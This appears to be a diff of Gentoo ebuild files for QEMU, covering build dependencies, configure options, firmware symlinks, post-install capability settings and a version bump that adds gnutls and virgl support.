# Install config file example for qemu-bridge-helper
insinto "/etc/qemu"
doins "${FILESDIR}/bridge.conf"
# Remove the docdir placed qmp-commands.txt
mv "${ED}/usr/share/doc/${PF}/html/qmp-commands.txt" "${S}/docs/qmp/"
cd "${S}"
dodoc Changelog MAINTAINERS docs/specs/pci-ids.txt
newdoc pc-bios/README README.pc-bios
dodoc docs/qmp/*.txt
if [[ -n ${softmmu_targets} ]]; then
# Remove SeaBIOS since we're using the SeaBIOS packaged one
rm "${ED}/usr/share/qemu/bios.bin"
if use qemu_softmmu_targets_x86_64 || use qemu_softmmu_targets_i386; then
dosym ../seabios/bios.bin /usr/share/qemu/bios.bin
fi
# Remove vgabios since we're using the vgabios packaged one
rm "${ED}/usr/share/qemu/vgabios.bin"
rm "${ED}/usr/share/qemu/vgabios-cirrus.bin"
rm "${ED}/usr/share/qemu/vgabios-qxl.bin"
rm "${ED}/usr/share/qemu/vgabios-stdvga.bin"
rm "${ED}/usr/share/qemu/vgabios-vmware.bin"
if use qemu_softmmu_targets_x86_64 || use qemu_softmmu_targets_i386; then
dosym ../vgabios/vgabios.bin /usr/share/qemu/vgabios.bin
dosym ../vgabios/vgabios-cirrus.bin /usr/share/qemu/vgabios-cirrus.bin
dosym ../vgabios/vgabios-qxl.bin /usr/share/qemu/vgabios-qxl.bin
dosym ../vgabios/vgabios-stdvga.bin /usr/share/qemu/vgabios-stdvga.bin
dosym ../vgabios/vgabios-vmware.bin /usr/share/qemu/vgabios-vmware.bin
fi
# Remove sgabios since we're using the sgabios packaged one
rm "${ED}/usr/share/qemu/sgabios.bin"
if use qemu_softmmu_targets_x86_64 || use qemu_softmmu_targets_i386; then
dosym ../sgabios/sgabios.bin /usr/share/qemu/sgabios.bin
fi
# Remove iPXE since we're using the iPXE packaged one
rm "${ED}"/usr/share/qemu/pxe-*.rom
if use qemu_softmmu_targets_x86_64 || use qemu_softmmu_targets_i386; then
dosym ../ipxe/8086100e.rom /usr/share/qemu/pxe-e1000.rom
dosym ../ipxe/80861209.rom /usr/share/qemu/pxe-eepro100.rom
dosym ../ipxe/10500940.rom /usr/share/qemu/pxe-ne2k_pci.rom
dosym ../ipxe/10222000.rom /usr/share/qemu/pxe-pcnet.rom
dosym ../ipxe/10ec8139.rom /usr/share/qemu/pxe-rtl8139.rom
dosym ../ipxe/1af41000.rom /usr/share/qemu/pxe-virtio.rom
fi
fi
qemu_support_kvm && readme.gentoo_create_doc
}
pkg_postinst() {
if qemu_support_kvm; then
readme.gentoo_print_elog
ewarn "Migration from qemu-kvm instances and loading qemu-kvm created"
ewarn "save states has been removed starting with the 1.6.2 release"
ewarn
ewarn "It is recommended that you migrate any VMs that may be running"
ewarn "on qemu-kvm to a host with a newer qemu and regenerate"
ewarn "any saved states with a newer qemu."
ewarn
ewarn "qemu-kvm was the primary qemu provider in Gentoo through 1.2.x"
if use x86 || use amd64; then
ewarn
ewarn "The /usr/bin/kvm and /usr/bin/qemu-kvm wrappers are no longer"
ewarn "installed. In order to use kvm acceleration, pass the flag"
ewarn "-enable-kvm when running your system target."
fi
fi
if [[ -n ${softmmu_targets} ]] && use kernel_linux; then
udev_reload
fi
fcaps cap_net_admin /usr/libexec/qemu-bridge-helper
if use virtfs && [ -n "${softmmu_targets}" ]; then
local virtfs_caps="cap_chown,cap_dac_override,cap_fowner,cap_fsetid,cap_setgid,cap_mknod,cap_setuid"
fcaps ${virtfs_caps} /usr/bin/virtfs-proxy-helper
fi
}
pkg_info() {
echo "Using:"
echo " $(best_version app-emulation/spice-protocol)"
echo " $(best_version sys-firmware/ipxe)"
echo " $(best_version sys-firmware/seabios)"
if has_version sys-firmware/seabios[binary]; then
echo " USE=binary"
else
echo " USE=''"
fi
echo " $(best_version sys-firmware/vgabios)"
}


@ -1,642 +0,0 @@
# Copyright 1999-2015 Gentoo Foundation
# Distributed under the terms of the GNU General Public License v2
# $Id$
EAPI=5
PYTHON_COMPAT=( python2_7 )
PYTHON_REQ_USE="ncurses,readline"
inherit eutils flag-o-matic linux-info toolchain-funcs multilib python-r1 \
user udev fcaps readme.gentoo pax-utils
BACKPORTS=
if [[ ${PV} = *9999* ]]; then
EGIT_REPO_URI="git://git.qemu.org/qemu.git"
inherit git-2
SRC_URI=""
else
SRC_URI="http://wiki.qemu-project.org/download/${P}.tar.bz2
${BACKPORTS:+
https://dev.gentoo.org/~cardoe/distfiles/${P}-${BACKPORTS}.tar.xz}"
KEYWORDS="~amd64 ~ppc ~ppc64 ~x86 ~x86-fbsd"
fi
DESCRIPTION="QEMU + Kernel-based Virtual Machine userland tools"
HOMEPAGE="http://www.qemu.org http://www.linux-kvm.org"
LICENSE="GPL-2 LGPL-2 BSD-2"
SLOT="0"
IUSE="accessibility +aio alsa bluetooth +caps +curl debug +fdt glusterfs \
gtk gtk2 infiniband iscsi +jpeg \
kernel_linux kernel_FreeBSD lzo ncurses nfs nls numa opengl +pin-upstream-blobs
+png pulseaudio python \
rbd sasl +seccomp sdl sdl2 selinux smartcard snappy spice ssh static static-softmmu
static-user systemtap tci test +threads tls usb usbredir +uuid vde +vhost-net \
virtfs +vnc vte xattr xen xfs"
COMMON_TARGETS="aarch64 alpha arm cris i386 m68k microblaze microblazeel mips
mips64 mips64el mipsel or32 ppc ppc64 s390x sh4 sh4eb sparc sparc64 unicore32
x86_64"
IUSE_SOFTMMU_TARGETS="${COMMON_TARGETS} lm32 moxie ppcemb tricore xtensa xtensaeb"
IUSE_USER_TARGETS="${COMMON_TARGETS} armeb mipsn32 mipsn32el ppc64abi32 ppc64le sparc32plus"
use_softmmu_targets=$(printf ' qemu_softmmu_targets_%s' ${IUSE_SOFTMMU_TARGETS})
use_user_targets=$(printf ' qemu_user_targets_%s' ${IUSE_USER_TARGETS})
IUSE+=" ${use_softmmu_targets} ${use_user_targets}"
# Allow no targets to be built so that people can get a tools-only build.
# Block USE flag configurations known to not work.
REQUIRED_USE="${PYTHON_REQUIRED_USE}
gtk2? ( gtk )
qemu_softmmu_targets_arm? ( fdt )
qemu_softmmu_targets_microblaze? ( fdt )
qemu_softmmu_targets_ppc? ( fdt )
qemu_softmmu_targets_ppc64? ( fdt )
sdl2? ( sdl )
static? ( static-softmmu static-user )
static-softmmu? ( !alsa !pulseaudio !bluetooth !opengl !gtk !gtk2 )
virtfs? ( xattr )
vte? ( gtk )"
# Yep, you need both libcap and libcap-ng since virtfs only uses libcap.
#
# The attr lib isn't always linked in (although the USE flag is always
# respected). This is because qemu supports using the C library's API
# when available rather than always using the extranl library.
COMMON_LIB_DEPEND=">=dev-libs/glib-2.0[static-libs(+)]
sys-libs/zlib[static-libs(+)]
xattr? ( sys-apps/attr[static-libs(+)] )"
SOFTMMU_LIB_DEPEND="${COMMON_LIB_DEPEND}
>=x11-libs/pixman-0.28.0[static-libs(+)]
accessibility? ( app-accessibility/brltty[static-libs(+)] )
aio? ( dev-libs/libaio[static-libs(+)] )
alsa? ( >=media-libs/alsa-lib-1.0.13 )
bluetooth? ( net-wireless/bluez )
caps? ( sys-libs/libcap-ng[static-libs(+)] )
curl? ( >=net-misc/curl-7.15.4[static-libs(+)] )
fdt? ( >=sys-apps/dtc-1.4.0[static-libs(+)] )
glusterfs? ( >=sys-cluster/glusterfs-3.4.0[static-libs(+)] )
gtk? (
gtk2? (
x11-libs/gtk+:2
vte? ( x11-libs/vte:0 )
)
!gtk2? (
x11-libs/gtk+:3
vte? ( x11-libs/vte:2.90 )
)
)
infiniband? ( sys-infiniband/librdmacm:=[static-libs(+)] )
iscsi? ( net-libs/libiscsi )
jpeg? ( virtual/jpeg:=[static-libs(+)] )
lzo? ( dev-libs/lzo:2[static-libs(+)] )
ncurses? ( sys-libs/ncurses:0=[static-libs(+)] )
nfs? ( >=net-fs/libnfs-1.9.3[static-libs(+)] )
numa? ( sys-process/numactl[static-libs(+)] )
opengl? (
virtual/opengl
media-libs/libepoxy[static-libs(+)]
media-libs/mesa[static-libs(+)]
media-libs/mesa[egl,gles2]
)
png? ( media-libs/libpng:0=[static-libs(+)] )
pulseaudio? ( media-sound/pulseaudio )
rbd? ( sys-cluster/ceph[static-libs(+)] )
sasl? ( dev-libs/cyrus-sasl[static-libs(+)] )
sdl? (
!sdl2? (
media-libs/libsdl[X]
>=media-libs/libsdl-1.2.11[static-libs(+)]
)
sdl2? (
media-libs/libsdl2[X]
media-libs/libsdl2[static-libs(+)]
)
)
seccomp? ( >=sys-libs/libseccomp-2.1.0[static-libs(+)] )
smartcard? ( dev-libs/nss !app-emulation/libcacard )
snappy? ( app-arch/snappy[static-libs(+)] )
spice? (
>=app-emulation/spice-protocol-0.12.3
>=app-emulation/spice-0.12.0[static-libs(+)]
)
ssh? ( >=net-libs/libssh2-1.2.8[static-libs(+)] )
tls? ( net-libs/gnutls[static-libs(+)] )
usb? ( >=virtual/libusb-1-r2[static-libs(+)] )
usbredir? ( >=sys-apps/usbredir-0.6[static-libs(+)] )
uuid? ( >=sys-apps/util-linux-2.16.0[static-libs(+)] )
vde? ( net-misc/vde[static-libs(+)] )
virtfs? ( sys-libs/libcap )
xfs? ( sys-fs/xfsprogs[static-libs(+)] )"
USER_LIB_DEPEND="${COMMON_LIB_DEPEND}"
X86_FIRMWARE_DEPEND="
>=sys-firmware/ipxe-1.0.0_p20130624
pin-upstream-blobs? (
~sys-firmware/seabios-1.8.2
~sys-firmware/sgabios-0.1_pre8
~sys-firmware/vgabios-0.7a
)
!pin-upstream-blobs? (
sys-firmware/seabios
sys-firmware/sgabios
sys-firmware/vgabios
)"
CDEPEND="
!static-softmmu? ( $(printf "%s? ( ${SOFTMMU_LIB_DEPEND//\[static-libs(+)]} ) " ${use_softmmu_targets}) )
!static-user? ( $(printf "%s? ( ${USER_LIB_DEPEND//\[static-libs(+)]} ) " ${use_user_targets}) )
qemu_softmmu_targets_i386? ( ${X86_FIRMWARE_DEPEND} )
qemu_softmmu_targets_x86_64? ( ${X86_FIRMWARE_DEPEND} )
python? ( ${PYTHON_DEPS} )
systemtap? ( dev-util/systemtap )
xen? ( app-emulation/xen-tools )"
DEPEND="${CDEPEND}
dev-lang/perl
=dev-lang/python-2*
sys-apps/texinfo
virtual/pkgconfig
kernel_linux? ( >=sys-kernel/linux-headers-2.6.35 )
gtk? ( nls? ( sys-devel/gettext ) )
static-softmmu? ( $(printf "%s? ( ${SOFTMMU_LIB_DEPEND} ) " ${use_softmmu_targets}) )
static-user? ( $(printf "%s? ( ${USER_LIB_DEPEND} ) " ${use_user_targets}) )
test? (
dev-libs/glib[utils]
sys-devel/bc
)"
RDEPEND="${CDEPEND}
selinux? ( sec-policy/selinux-qemu )
"
STRIP_MASK="/usr/share/qemu/palcode-clipper"
QA_PREBUILT="
usr/share/qemu/openbios-ppc
usr/share/qemu/openbios-sparc64
usr/share/qemu/openbios-sparc32
usr/share/qemu/palcode-clipper
usr/share/qemu/s390-ccw.img
usr/share/qemu/u-boot.e500
"
QA_WX_LOAD="usr/bin/qemu-i386
usr/bin/qemu-x86_64
usr/bin/qemu-alpha
usr/bin/qemu-arm
usr/bin/qemu-cris
usr/bin/qemu-m68k
usr/bin/qemu-microblaze
usr/bin/qemu-microblazeel
usr/bin/qemu-mips
usr/bin/qemu-mipsel
usr/bin/qemu-or32
usr/bin/qemu-ppc
usr/bin/qemu-ppc64
usr/bin/qemu-ppc64abi32
usr/bin/qemu-sh4
usr/bin/qemu-sh4eb
usr/bin/qemu-sparc
usr/bin/qemu-sparc64
usr/bin/qemu-armeb
usr/bin/qemu-sparc32plus
usr/bin/qemu-s390x
usr/bin/qemu-unicore32"
DOC_CONTENTS="If you don't have kvm compiled into the kernel, make sure
you have the kernel module loaded before running kvm. The easiest way to
ensure that the kernel module is loaded is to load it on boot.\n
For AMD CPUs the module is called 'kvm-amd'\n
For Intel CPUs the module is called 'kvm-intel'\n
Please review /etc/conf.d/modules for how to load these\n\n
Make sure your user is in the 'kvm' group\n
Just run 'gpasswd -a <USER> kvm', then have <USER> re-login."
qemu_support_kvm() {
if use qemu_softmmu_targets_x86_64 || use qemu_softmmu_targets_i386 \
use qemu_softmmu_targets_ppc || use qemu_softmmu_targets_ppc64 \
use qemu_softmmu_targets_s390x; then
return 0
fi
return 1
}
pkg_pretend() {
if use kernel_linux && kernel_is lt 2 6 25; then
eerror "This version of KVM requres a host kernel of 2.6.25 or higher."
elif use kernel_linux; then
if ! linux_config_exists; then
eerror "Unable to check your kernel for KVM support"
else
CONFIG_CHECK="~KVM ~TUN ~BRIDGE"
ERROR_KVM="You must enable KVM in your kernel to continue"
ERROR_KVM_AMD="If you have an AMD CPU, you must enable KVM_AMD in"
ERROR_KVM_AMD+=" your kernel configuration."
ERROR_KVM_INTEL="If you have an Intel CPU, you must enable"
ERROR_KVM_INTEL+=" KVM_INTEL in your kernel configuration."
ERROR_TUN="You will need the Universal TUN/TAP driver compiled"
ERROR_TUN+=" into your kernel or loaded as a module to use the"
ERROR_TUN+=" virtual network device if using -net tap."
ERROR_BRIDGE="You will also need support for 802.1d"
ERROR_BRIDGE+=" Ethernet Bridging for some network configurations."
use vhost-net && CONFIG_CHECK+=" ~VHOST_NET"
ERROR_VHOST_NET="You must enable VHOST_NET to have vhost-net"
ERROR_VHOST_NET+=" support"
if use amd64 || use x86 || use amd64-linux || use x86-linux; then
CONFIG_CHECK+=" ~KVM_AMD ~KVM_INTEL"
fi
use python && CONFIG_CHECK+=" ~DEBUG_FS"
ERROR_DEBUG_FS="debugFS support required for kvm_stat"
# Now do the actual checks setup above
check_extra_config
fi
fi
if grep -qs '/usr/bin/qemu-kvm' "${EROOT}"/etc/libvirt/qemu/*.xml; then
eerror "The kvm/qemu-kvm wrappers no longer exist, but your libvirt"
eerror "instances are still pointing to it. Please update your"
eerror "configs in /etc/libvirt/qemu/ to use the -enable-kvm flag"
eerror "and the right system binary (e.g. qemu-system-x86_64)."
die "update your virt configs to not use qemu-kvm"
fi
}
pkg_setup() {
enewgroup kvm 78
}
# Sanity check to make sure target lists are kept up-to-date.
check_targets() {
local var=$1 mak=$2
local detected sorted
pushd "${S}"/default-configs >/dev/null || die
# Force C locale until glibc is updated. #564936
detected=$(echo $(printf '%s\n' *-${mak}.mak | sed "s:-${mak}.mak::" | LC_COLLATE=C sort -u))
sorted=$(echo $(printf '%s\n' ${!var} | LC_COLLATE=C sort -u))
if [[ ${sorted} != "${detected}" ]] ; then
eerror "The ebuild needs to be kept in sync."
eerror "${var}: ${sorted}"
eerror "$(printf '%-*s' ${#var} configure): ${detected}"
die "sync ${var} to the list of targets"
fi
popd >/dev/null
}
src_prepare() {
check_targets IUSE_SOFTMMU_TARGETS softmmu
check_targets IUSE_USER_TARGETS linux-user
# Alter target makefiles to accept CFLAGS set via flag-o
sed -i -r \
-e 's/^(C|OP_C|HELPER_C)FLAGS=/\1FLAGS+=/' \
Makefile Makefile.target || die
# Cheap hack to disable gettext .mo generation.
use nls || rm -f po/*.po
epatch "${FILESDIR}"/qemu-1.7.0-cflags.patch
epatch "${FILESDIR}"/${PN}-2.4-mips-* #563162
[[ -n ${BACKPORTS} ]] && \
EPATCH_FORCE=yes EPATCH_SUFFIX="patch" EPATCH_SOURCE="${S}/patches" \
epatch
# Fix ld and objcopy being called directly
tc-export AR LD OBJCOPY
# Verbose builds
MAKEOPTS+=" V=1"
epatch_user
}
##
# configures qemu based on the build directory and the build type
# we are using.
#
qemu_src_configure() {
debug-print-function ${FUNCNAME} "$@"
local buildtype=$1
local builddir="${S}/${buildtype}-build"
local static_flag="static-${buildtype}"
mkdir "${builddir}"
local conf_opts=(
--prefix=/usr
--sysconfdir=/etc
--libdir=/usr/$(get_libdir)
--docdir=/usr/share/doc/${PF}/html
--disable-bsd-user
--disable-guest-agent
--disable-strip
--disable-werror
--python="${PYTHON}"
--cc="$(tc-getCC)"
--cxx="$(tc-getCXX)"
--host-cc="$(tc-getBUILD_CC)"
$(use_enable debug debug-info)
$(use_enable debug debug-tcg)
--enable-docs
$(use_enable tci tcg-interpreter)
$(use_enable xattr attr)
)
# Disable options not used by user targets as the default configure
# options will autoprobe and try to link in a bunch of unused junk.
conf_softmmu() {
if [[ ${buildtype} == "user" ]] ; then
echo "--disable-${2:-$1}"
else
use_enable "$@"
fi
}
conf_opts+=(
$(conf_softmmu accessibility brlapi)
$(conf_softmmu aio linux-aio)
$(conf_softmmu bluetooth bluez)
$(conf_softmmu caps cap-ng)
$(conf_softmmu curl)
$(conf_softmmu fdt)
$(conf_softmmu glusterfs)
$(conf_softmmu gtk)
$(conf_softmmu infiniband rdma)
$(conf_softmmu iscsi libiscsi)
$(conf_softmmu jpeg vnc-jpeg)
$(conf_softmmu kernel_linux kvm)
$(conf_softmmu lzo)
$(conf_softmmu ncurses curses)
$(conf_softmmu nfs libnfs)
$(conf_softmmu numa)
$(conf_softmmu opengl)
$(conf_softmmu png vnc-png)
$(conf_softmmu rbd)
$(conf_softmmu sasl vnc-sasl)
$(conf_softmmu sdl)
$(conf_softmmu seccomp)
$(conf_softmmu smartcard smartcard-nss)
$(conf_softmmu snappy)
$(conf_softmmu spice)
$(conf_softmmu ssh libssh2)
$(conf_softmmu tls vnc-tls)
$(conf_softmmu usb libusb)
$(conf_softmmu usbredir usb-redir)
$(conf_softmmu uuid)
$(conf_softmmu vde)
$(conf_softmmu vhost-net)
$(conf_softmmu virtfs)
$(conf_softmmu vnc)
$(conf_softmmu vte)
$(conf_softmmu xen)
$(conf_softmmu xen xen-pci-passthrough)
$(conf_softmmu xfs xfsctl)
)
case ${buildtype} in
user)
conf_opts+=(
--enable-linux-user
--disable-system
--disable-blobs
--disable-tools
)
;;
softmmu)
# audio options
local audio_opts="oss"
use alsa && audio_opts="alsa,${audio_opts}"
use sdl && audio_opts="sdl,${audio_opts}"
use pulseaudio && audio_opts="pa,${audio_opts}"
conf_opts+=(
--disable-linux-user
--enable-system
--with-system-pixman
--audio-drv-list="${audio_opts}"
)
use gtk && conf_opts+=( --with-gtkabi=$(usex gtk2 2.0 3.0) )
use sdl && conf_opts+=( --with-sdlabi=$(usex sdl2 2.0 1.2) )
;;
tools)
conf_opts+=(
--disable-linux-user
--disable-system
--disable-blobs
)
static_flag="static"
;;
esac
local targets="${buildtype}_targets"
[[ -n ${targets} ]] && conf_opts+=( --target-list="${!targets}" )
# Add support for SystemTAP
use systemtap && conf_opts+=( --enable-trace-backend=dtrace )
# We always want to attempt to build with PIE support as it results
# in a more secure binary. But it doesn't work with static or if
# the current GCC doesn't have PIE support.
if use ${static_flag}; then
conf_opts+=( --static --disable-pie )
else
gcc-specs-pie && conf_opts+=( --enable-pie )
fi
echo "../configure ${conf_opts[*]}"
cd "${builddir}"
../configure "${conf_opts[@]}" || die "configure failed"
# FreeBSD's kernel does not support QEMU assigning/grabbing
# host USB devices yet
use kernel_FreeBSD && \
sed -i -E -e "s|^(HOST_USB=)bsd|\1stub|" "${S}"/config-host.mak
}
src_configure() {
local target
python_setup
softmmu_targets= softmmu_bins=()
user_targets= user_bins=()
for target in ${IUSE_SOFTMMU_TARGETS} ; do
if use "qemu_softmmu_targets_${target}"; then
softmmu_targets+=",${target}-softmmu"
softmmu_bins+=( "qemu-system-${target}" )
fi
done
for target in ${IUSE_USER_TARGETS} ; do
if use "qemu_user_targets_${target}"; then
user_targets+=",${target}-linux-user"
user_bins+=( "qemu-${target}" )
fi
done
softmmu_targets=${softmmu_targets#,}
user_targets=${user_targets#,}
[[ -n ${softmmu_targets} ]] && qemu_src_configure "softmmu"
[[ -n ${user_targets} ]] && qemu_src_configure "user"
[[ -z ${softmmu_targets}${user_targets} ]] && qemu_src_configure "tools"
}
src_compile() {
if [[ -n ${user_targets} ]]; then
cd "${S}/user-build"
default
fi
if [[ -n ${softmmu_targets} ]]; then
cd "${S}/softmmu-build"
default
fi
if [[ -z ${softmmu_targets}${user_targets} ]]; then
cd "${S}/tools-build"
default
fi
}
src_test() {
if [[ -n ${softmmu_targets} ]]; then
cd "${S}/softmmu-build"
pax-mark m */qemu-system-* #515550
emake -j1 check
emake -j1 check-report.html
fi
}
qemu_python_install() {
python_domodule "${S}/scripts/qmp/qmp.py"
python_doscript "${S}/scripts/kvm/kvm_stat"
python_doscript "${S}/scripts/kvm/vmxcap"
python_doscript "${S}/scripts/qmp/qmp-shell"
python_doscript "${S}/scripts/qmp/qemu-ga-client"
}
src_install() {
if [[ -n ${user_targets} ]]; then
cd "${S}/user-build"
emake DESTDIR="${ED}" install
# Install binfmt handler init script for user targets
newinitd "${FILESDIR}/qemu-binfmt.initd-r1" qemu-binfmt
fi
if [[ -n ${softmmu_targets} ]]; then
cd "${S}/softmmu-build"
emake DESTDIR="${ED}" install
# This might not exist if the test failed. #512010
[[ -e check-report.html ]] && dohtml check-report.html
if use kernel_linux; then
udev_dorules "${FILESDIR}"/65-kvm.rules
fi
if use python; then
python_foreach_impl qemu_python_install
fi
fi
if [[ -z ${softmmu_targets}${user_targets} ]]; then
cd "${S}/tools-build"
emake DESTDIR="${ED}" install
fi
# Disable mprotect on the qemu binaries as they use JITs to be fast #459348
pushd "${ED}"/usr/bin >/dev/null
pax-mark m "${softmmu_bins[@]}" "${user_bins[@]}"
popd >/dev/null
# Install config file example for qemu-bridge-helper
insinto "/etc/qemu"
doins "${FILESDIR}/bridge.conf"
# Remove the docdir placed qmp-commands.txt
mv "${ED}/usr/share/doc/${PF}/html/qmp-commands.txt" "${S}/docs/qmp/"
cd "${S}"
dodoc Changelog MAINTAINERS docs/specs/pci-ids.txt
newdoc pc-bios/README README.pc-bios
dodoc docs/qmp/*.txt
if [[ -n ${softmmu_targets} ]]; then
# Remove SeaBIOS since we're using the SeaBIOS packaged one
rm "${ED}/usr/share/qemu/bios.bin"
if use qemu_softmmu_targets_x86_64 || use qemu_softmmu_targets_i386; then
dosym ../seabios/bios.bin /usr/share/qemu/bios.bin
fi
# Remove vgabios since we're using the vgabios packaged one
rm "${ED}/usr/share/qemu/vgabios.bin"
rm "${ED}/usr/share/qemu/vgabios-cirrus.bin"
rm "${ED}/usr/share/qemu/vgabios-qxl.bin"
rm "${ED}/usr/share/qemu/vgabios-stdvga.bin"
rm "${ED}/usr/share/qemu/vgabios-vmware.bin"
if use qemu_softmmu_targets_x86_64 || use qemu_softmmu_targets_i386; then
dosym ../vgabios/vgabios.bin /usr/share/qemu/vgabios.bin
dosym ../vgabios/vgabios-cirrus.bin /usr/share/qemu/vgabios-cirrus.bin
dosym ../vgabios/vgabios-qxl.bin /usr/share/qemu/vgabios-qxl.bin
dosym ../vgabios/vgabios-stdvga.bin /usr/share/qemu/vgabios-stdvga.bin
dosym ../vgabios/vgabios-vmware.bin /usr/share/qemu/vgabios-vmware.bin
fi
# Remove sgabios since we're using the sgabios packaged one
rm "${ED}/usr/share/qemu/sgabios.bin"
if use qemu_softmmu_targets_x86_64 || use qemu_softmmu_targets_i386; then
dosym ../sgabios/sgabios.bin /usr/share/qemu/sgabios.bin
fi
# Remove iPXE since we're using the iPXE packaged one
rm "${ED}"/usr/share/qemu/pxe-*.rom
if use qemu_softmmu_targets_x86_64 || use qemu_softmmu_targets_i386; then
dosym ../ipxe/8086100e.rom /usr/share/qemu/pxe-e1000.rom
dosym ../ipxe/80861209.rom /usr/share/qemu/pxe-eepro100.rom
dosym ../ipxe/10500940.rom /usr/share/qemu/pxe-ne2k_pci.rom
dosym ../ipxe/10222000.rom /usr/share/qemu/pxe-pcnet.rom
dosym ../ipxe/10ec8139.rom /usr/share/qemu/pxe-rtl8139.rom
dosym ../ipxe/1af41000.rom /usr/share/qemu/pxe-virtio.rom
fi
fi
qemu_support_kvm && readme.gentoo_create_doc
}
pkg_postinst() {
if qemu_support_kvm; then
readme.gentoo_print_elog
fi
if [[ -n ${softmmu_targets} ]] && use kernel_linux; then
udev_reload
fi
fcaps cap_net_admin /usr/libexec/qemu-bridge-helper
if use virtfs && [ -n "${softmmu_targets}" ]; then
local virtfs_caps="cap_chown,cap_dac_override,cap_fowner,cap_fsetid,cap_setgid,cap_mknod,cap_setuid"
fcaps ${virtfs_caps} /usr/bin/virtfs-proxy-helper
fi
}
pkg_info() {
echo "Using:"
echo " $(best_version app-emulation/spice-protocol)"
echo " $(best_version sys-firmware/ipxe)"
echo " $(best_version sys-firmware/seabios)"
if has_version 'sys-firmware/seabios[binary]'; then
echo " USE=binary"
else
echo " USE=''"
fi
echo " $(best_version sys-firmware/vgabios)"
}


@ -1,4 +1,4 @@
# Copyright 1999-2015 Gentoo Foundation # Copyright 1999-2016 Gentoo Foundation
# Distributed under the terms of the GNU General Public License v2 # Distributed under the terms of the GNU General Public License v2
# $Id$ # $Id$
@ -7,8 +7,10 @@ EAPI=5
PYTHON_COMPAT=( python2_7 ) PYTHON_COMPAT=( python2_7 )
PYTHON_REQ_USE="ncurses,readline" PYTHON_REQ_USE="ncurses,readline"
PLOCALES="de_DE fr_FR hu it tr zh_CN"
inherit eutils flag-o-matic linux-info toolchain-funcs multilib python-r1 \ inherit eutils flag-o-matic linux-info toolchain-funcs multilib python-r1 \
user udev fcaps readme.gentoo pax-utils user udev fcaps readme.gentoo pax-utils l10n
BACKPORTS= BACKPORTS=
@ -20,7 +22,7 @@ else
SRC_URI="http://wiki.qemu-project.org/download/${P}.tar.bz2 SRC_URI="http://wiki.qemu-project.org/download/${P}.tar.bz2
${BACKPORTS:+ ${BACKPORTS:+
https://dev.gentoo.org/~cardoe/distfiles/${P}-${BACKPORTS}.tar.xz}" https://dev.gentoo.org/~cardoe/distfiles/${P}-${BACKPORTS}.tar.xz}"
KEYWORDS="amd64 ~ppc ~ppc64 x86 ~x86-fbsd" KEYWORDS="amd64 ~arm64 ~ppc ~ppc64 x86 ~x86-fbsd"
fi fi
DESCRIPTION="QEMU + Kernel-based Virtual Machine userland tools" DESCRIPTION="QEMU + Kernel-based Virtual Machine userland tools"
@ -29,18 +31,18 @@ HOMEPAGE="http://www.qemu.org http://www.linux-kvm.org"
LICENSE="GPL-2 LGPL-2 BSD-2" LICENSE="GPL-2 LGPL-2 BSD-2"
SLOT="0" SLOT="0"
IUSE="accessibility +aio alsa bluetooth +caps +curl debug +fdt glusterfs \ IUSE="accessibility +aio alsa bluetooth +caps +curl debug +fdt glusterfs \
gtk gtk2 infiniband iscsi +jpeg \ gnutls gtk gtk2 infiniband iscsi +jpeg \
kernel_linux kernel_FreeBSD lzo ncurses nfs nls numa opengl +pin-upstream-blobs kernel_linux kernel_FreeBSD lzo ncurses nfs nls numa opengl +pin-upstream-blobs
+png pulseaudio python \ +png pulseaudio python \
rbd sasl +seccomp sdl sdl2 selinux smartcard snappy spice ssh static static-softmmu rbd sasl +seccomp sdl sdl2 selinux smartcard snappy spice ssh static static-softmmu
static-user systemtap tci test +threads tls usb usbredir +uuid vde +vhost-net \ static-user systemtap tci test +threads usb usbredir +uuid vde +vhost-net \
virtfs +vnc vte xattr xen xfs" virgl virtfs +vnc vte xattr xen xfs"
COMMON_TARGETS="aarch64 alpha arm cris i386 m68k microblaze microblazeel mips COMMON_TARGETS="aarch64 alpha arm cris i386 m68k microblaze microblazeel mips
mips64 mips64el mipsel or32 ppc ppc64 s390x sh4 sh4eb sparc sparc64 unicore32 mips64 mips64el mipsel or32 ppc ppc64 s390x sh4 sh4eb sparc sparc64 unicore32
x86_64" x86_64"
IUSE_SOFTMMU_TARGETS="${COMMON_TARGETS} lm32 moxie ppcemb tricore xtensa xtensaeb" IUSE_SOFTMMU_TARGETS="${COMMON_TARGETS} lm32 moxie ppcemb tricore xtensa xtensaeb"
IUSE_USER_TARGETS="${COMMON_TARGETS} armeb mipsn32 mipsn32el ppc64abi32 ppc64le sparc32plus" IUSE_USER_TARGETS="${COMMON_TARGETS} armeb mipsn32 mipsn32el ppc64abi32 ppc64le sparc32plus tilegx"
use_softmmu_targets=$(printf ' qemu_softmmu_targets_%s' ${IUSE_SOFTMMU_TARGETS}) use_softmmu_targets=$(printf ' qemu_softmmu_targets_%s' ${IUSE_SOFTMMU_TARGETS})
use_user_targets=$(printf ' qemu_user_targets_%s' ${IUSE_USER_TARGETS}) use_user_targets=$(printf ' qemu_user_targets_%s' ${IUSE_USER_TARGETS})
@ -65,6 +67,9 @@ REQUIRED_USE="${PYTHON_REQUIRED_USE}
# The attr lib isn't always linked in (although the USE flag is always # The attr lib isn't always linked in (although the USE flag is always
# respected). This is because qemu supports using the C library's API # respected). This is because qemu supports using the C library's API
# when available rather than always using the extranl library. # when available rather than always using the extranl library.
#
# Older versions of gnutls are supported, but it's simpler to just require
# the latest versions. This is also why we require nettle.
COMMON_LIB_DEPEND=">=dev-libs/glib-2.0[static-libs(+)] COMMON_LIB_DEPEND=">=dev-libs/glib-2.0[static-libs(+)]
sys-libs/zlib[static-libs(+)] sys-libs/zlib[static-libs(+)]
xattr? ( sys-apps/attr[static-libs(+)] )" xattr? ( sys-apps/attr[static-libs(+)] )"
@ -78,6 +83,10 @@ SOFTMMU_LIB_DEPEND="${COMMON_LIB_DEPEND}
curl? ( >=net-misc/curl-7.15.4[static-libs(+)] ) curl? ( >=net-misc/curl-7.15.4[static-libs(+)] )
fdt? ( >=sys-apps/dtc-1.4.0[static-libs(+)] ) fdt? ( >=sys-apps/dtc-1.4.0[static-libs(+)] )
glusterfs? ( >=sys-cluster/glusterfs-3.4.0[static-libs(+)] ) glusterfs? ( >=sys-cluster/glusterfs-3.4.0[static-libs(+)] )
gnutls? (
dev-libs/nettle[static-libs(+)]
>=net-libs/gnutls-3.0[static-libs(+)]
)
gtk? ( gtk? (
gtk2? ( gtk2? (
x11-libs/gtk+:2 x11-libs/gtk+:2
@ -116,18 +125,18 @@ SOFTMMU_LIB_DEPEND="${COMMON_LIB_DEPEND}
) )
) )
